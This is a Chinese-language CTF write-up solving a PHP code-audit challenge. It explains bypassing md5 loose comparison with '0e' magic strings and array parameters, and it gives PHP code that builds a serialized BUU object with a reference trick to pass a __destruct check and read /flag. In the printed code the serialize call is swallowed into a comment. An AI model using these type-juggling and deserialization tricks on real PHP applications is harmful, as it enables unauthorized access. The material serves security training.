题目
步骤
打开靶机地址,是一段php代码
通过代码审计可以得到以下信息
1.创建了一个BUU类,类里有两个属性分别为’input’和’correct’,当类对象被销毁时给correct赋值,并且判断correct和input的值是否相等,如果相等则会输出flag。
uniqid()函数会基于以微秒计的当前时间,生成一个唯一的 ID。
base64_encode()则会对字符串进行加密
2.判断GET参数pleaseget的值是否为1,POST参数pleasepost的值是否为2,参数md51和md52的值是否不等,经过md5加密后的参数md51和md52的值是否相等,这四个条件同时满足的话,对POST参数obj进行反序列化,而对象被反序列化时会调用__destruct方法。
通过上述信息我们要做的事就很简单,构建一个url,满足上述条件,即可获得flag信息
pleaseget和pleasepost的值固定,所以不需要额外制定,md51和md52则是一个绕过弱md5的问题。
常见的绕过弱md5的方法有两种:
1.科学计数法绕过,原理是php里面在做 == 的时候会先把两边的类型转成一样的,因为是0e开头,php会认为它是科学技计数法,而0的多少次方都是0
常见的绕过值有:QNKCDZO、s155964671a、s1091221200a
2.数组绕过,原理是 md5 等函数不能处理数组,导致函数返回null。而null是等于null的,导致了绕过
最后是进行反序列化的obj。
序列化的定义是:在计算机科学的数据处理中,是指将数据结构或对象状态转换成可取用格式(例如存成文件,存于缓冲,或经由网络中发送)以留待后续在相同或另一台计算机环境中,能恢复原先状态的过程。
类似于物流快递对物品的处理过程。拆解打包 =>运输=>拆包组装
简单理解就是将对象序列化后得到可取用的数据格式,在另一台计算机环境中再反序列化为原先的对象状态。
所以我们需要创建一个BUU对象,并且将它序列化,得到可用的obj参数。
创建一个php文件
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/10/6
* Time: 8:04 PM
*/
highlight_file(__FILE__);
class BUU {
public $correct = "";
public $input = "";
public function __destruct() {
try {
$this->correct = base64_encode(uniqid());
if($this->correct === $this->input) {
echo file_get_contents("/flag");
}
} catch (Exception $e) {
}
}
}
$obj =new BUU;
$obj->input = &$obj->correct; //因为最后判断需要correct的值与input的值相等,所以我们让input的值指向 echo serialize($obj); //correct的地址,这样这两个值无论什么情况下都相等
?>
执行一下,得到序列化后的obj。
然后开始构建url,通过hackbar发送一个post请求和一个get请求,最终得到flag的值。
提交flag,通关成功